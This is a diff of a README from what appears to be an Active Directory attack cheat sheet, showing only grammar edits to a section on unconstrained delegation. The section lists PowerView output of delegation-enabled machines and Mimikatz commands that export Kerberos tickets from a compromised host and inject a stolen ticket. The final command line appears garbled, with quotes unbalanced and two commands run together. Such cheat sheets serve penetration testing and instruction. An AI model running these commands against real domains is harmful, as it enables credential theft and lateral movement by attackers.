punishell/ADCheatSheet/README.md

 ```

 ### Unconstrained Delegation
-Looking for machines that allow unconstrained delegation.
+Looking for machines that allow unconstrained delegation:
 ```
 PS C:\ad> (Get-DomainComputer -Unconstrained).cn
 MVU-DC1
 MVU-PROD
 ```
-In order to perform attack, MVU-PROD should be compromised and following command need to be executed:
+In order to perform the attack, MVU-PROD should be compromised and following command needs to be executed:
 ```
 Invoke-Mimikatz –Command '"sekurlsa::tickets /export" Invoke-Mimikatz –Command '"kerberos::ptt C:\ad\SOMEUSER.kirbi"